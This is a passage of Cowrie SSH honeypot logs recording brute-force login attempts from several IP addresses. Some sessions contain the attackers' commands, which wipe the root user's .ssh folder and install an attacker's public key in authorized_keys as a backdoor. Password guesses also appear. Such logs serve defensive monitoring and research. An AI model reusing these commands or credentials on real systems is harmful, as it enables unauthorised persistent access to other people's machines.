03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T11:11:25.927948Z","src_ip":"85.209.134.43","session":"e97e1ae044bc"}
{"eventid":"cowrie.login.success","username":"root","password":"xu123456","message":"login attempt [root/xu123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:11:26.323909Z","src_ip":"85.209.134.43","session":"e97e1ae044bc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:11:26.519138Z","src_ip":"85.209.134.43","session":"e97e1ae044bc"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T11:11:26.519922Z","src_ip":"85.209.134.43","session":"e97e1ae044bc"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T11:11:26.521188Z","src_ip":"85.209.134.43","session":"e97e1ae044bc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:11:26.607574Z","src_ip":"85.209.134.43","session":"e97e1ae044bc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:11:26.874783Z","src_ip":"85.209.134.43","session":"e97e1ae044bc"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T11:11:26.875489Z","src_ip":"85.209.134.43","session":"e97e1ae044bc"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T11:11:26.963065Z","src_ip":"85.209.134.43","session":"e97e1ae044bc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:11:26.963974Z","src_ip":"85.209.134.43","session":"e97e1ae044bc"}
{"eventid":"cowrie.session.connect","src_ip":"85.209.134.43","src_port":36388,"dst_ip":"1.2.3.4","dst_port":22,"session":"b5fd052d7fda","protocol":"ssh","message":"New connection: 85.209.134.43:36388 (1.2.3.4:22) [session: b5fd052d7fda]","sensor":"my-vps","timestamp":"2025-08-26T11:11:27.050001Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T11:11:27.050717Z","src_ip":"85.209.134.43","session":"b5fd052d7fda"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T11:11:27.138623Z","src_ip":"85.209.134.43","session":"b5fd052d7fda"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T11:11:27.529356Z","src_ip":"85.209.134.43","session":"b5fd052d7fda"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:11:28.622100Z","src_ip":"85.209.134.43","session":"b5fd052d7fda"}
{"eventid":"cowrie.session.connect","src_ip":"85.209.134.43","src_port":36404,"dst_ip":"1.2.3.4","dst_port":22,"session":"dbfbee65a08a","protocol":"ssh","message":"New connection: 85.209.134.43:36404 (1.2.3.4:22) [session: dbfbee65a08a]","sensor":"my-vps","timestamp":"2025-08-26T11:11:28.708905Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T11:11:28.709543Z","src_ip":"85.209.134.43","session":"dbfbee65a08a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T11:11:28.797178Z","src_ip":"85.209.134.43","session":"dbfbee65a08a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:11:29.188669Z","src_ip":"85.209.134.43","session":"dbfbee65a08a"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:11:29.278093Z","src_ip":"85.209.134.43","session":"e97e1ae044bc"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:11:29.278965Z","src_ip":"85.209.134.43","session":"dbfbee65a08a"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":59054,"dst_ip":"1.2.3.4","dst_port":22,"session":"66762f38ba4a","protocol":"ssh","message":"New connection: 196.251.86.249:59054 (1.2.3.4:22) [session: 66762f38ba4a]","sensor":"my-vps","timestamp":"2025-08-26T11:11:29.359660Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:11:29.995443Z","src_ip":"196.251.86.249","session":"66762f38ba4a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:11:29.996192Z","src_ip":"196.251.86.249","session":"66762f38ba4a"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"123","message":"login attempt [hadoop/123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:11:31.942103Z","src_ip":"196.251.86.249","session":"66762f38ba4a"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:11:33.669774Z","src_ip":"196.251.86.249","session":"66762f38ba4a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":16268,"dst_ip":"1.2.3.4","dst_port":22,"session":"152d99989f61","protocol":"ssh","message":"New connection: 212.227.235.229:16268 (1.2.3.4:22) [session: 152d99989f61]","sensor":"my-vps","timestamp":"2025-08-26T11:12:24.257654Z"}
{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u00030\u0661f\\x89\\x86xM\\xcav\"\\x82\\xcd\u000e_F\u0010mc\\xd4\\\u0000mm\\xf9\\xff\u02eeW\\xbetS\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","message":"Remote SSH version: \u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u00030\u0661f\\x89\\x86xM\\xcav\"\\x82\\xcd\u000e_F\u0010mc\\xd4\\\u0000mm\\xf9\\xff\u02eeW\\xbetS\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","sensor":"my-vps","timestamp":"2025-08-26T11:12:24.260601Z","src_ip":"212.227.235.229","session":"152d99989f61"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:12:24.262158Z","src_ip":"212.227.235.229","session":"152d99989f61"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":59256,"dst_ip":"1.2.3.4","dst_port":22,"session":"e281f530ccf9","protocol":"ssh","message":"New connection: 196.251.86.249:59256 (1.2.3.4:22) [session: e281f530ccf9]","sensor":"my-vps","timestamp":"2025-08-26T11:12:29.237505Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:12:29.871948Z","src_ip":"196.251.86.249","session":"e281f530ccf9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:12:29.872778Z","src_ip":"196.251.86.249","session":"e281f530ccf9"}
{"eventid":"cowrie.session.connect","src_ip":"64.62.156.172","src_port":23736,"dst_ip":"1.2.3.4","dst_port":22,"session":"82f57b04828a","protocol":"ssh","message":"New connection: 64.62.156.172:23736 (1.2.3.4:22) [session: 82f57b04828a]","sensor":"my-vps","timestamp":"2025-08-26T11:12:31.691227Z"}
{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003;\\xdd\\xf2{\\xb4\u04f9\\xbd\\xc6\\xe3\\xc2NE\\x8f\\xf9\u000ejGf\u0006mK\\xb1I\u0004]]\\x89\\xac@\\xbe+\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","message":"Remote SSH version: \u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003;\\xdd\\xf2{\\xb4\u04f9\\xbd\\xc6\\xe3\\xc2NE\\x8f\\xf9\u000ejGf\u0006mK\\xb1I\u0004]]\\x89\\xac@\\xbe+\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","sensor":"my-vps","timestamp":"2025-08-26T11:12:31.693396Z","src_ip":"64.62.156.172","session":"82f57b04828a"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:12:31.694446Z","src_ip":"64.62.156.172","session":"82f57b04828a"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"321","message":"login attempt [hadoop/321] failed","sensor":"my-vps","timestamp":"2025-08-26T11:12:32.472113Z","src_ip":"196.251.86.249","session":"e281f530ccf9"}
{"eventid":"cowrie.session.connect","src_ip":"104.208.108.166","src_port":31118,"dst_ip":"1.2.3.4","dst_port":22,"session":"a55d9a79928a","protocol":"ssh","message":"New connection: 104.208.108.166:31118 (1.2.3.4:22) [session: a55d9a79928a]","sensor":"my-vps","timestamp":"2025-08-26T11:12:33.040834Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T11:12:33.041672Z","src_ip":"104.208.108.166","session":"a55d9a79928a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T11:12:33.249269Z","src_ip":"104.208.108.166","session":"a55d9a79928a"}
{"eventid":"cowrie.login.success","username":"root","password":"admin_2023","message":"login attempt [root/admin_2023] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:12:34.120270Z","src_ip":"104.208.108.166","session":"a55d9a79928a"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:12:34.154316Z","src_ip":"196.251.86.249","session":"e281f530ccf9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:12:34.589552Z","src_ip":"104.208.108.166","session":"a55d9a79928a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T11:12:34.590255Z","src_ip":"104.208.108.166","session":"a55d9a79928a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T11:12:34.591232Z","src_ip":"104.208.108.166","session":"a55d9a79928a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:12:34.799864Z","src_ip":"104.208.108.166","session":"a55d9a79928a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:12:35.232671Z","src_ip":"104.208.108.166","session":"a55d9a79928a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T11:12:35.233340Z","src_ip":"104.208.108.166","session":"a55d9a79928a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T11:12:35.442826Z","src_ip":"104.208.108.166","session":"a55d9a79928a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:12:35.443746Z","src_ip":"104.208.108.166","session":"a55d9a79928a"}
{"eventid":"cowrie.session.connect","src_ip":"104.208.108.166","src_port":31134,"dst_ip":"1.2.3.4","dst_port":22,"session":"26376f6524d1","protocol":"ssh","message":"New connection: 104.208.108.166:31134 (1.2.3.4:22) [session: 26376f6524d1]","sensor":"my-vps","timestamp":"2025-08-26T11:12:35.650048Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T11:12:35.650699Z","src_ip":"104.208.108.166","session":"26376f6524d1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T11:12:35.858438Z","src_ip":"104.208.108.166","session":"26376f6524d1"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T11:12:36.729814Z","src_ip":"104.208.108.166","session":"26376f6524d1"}
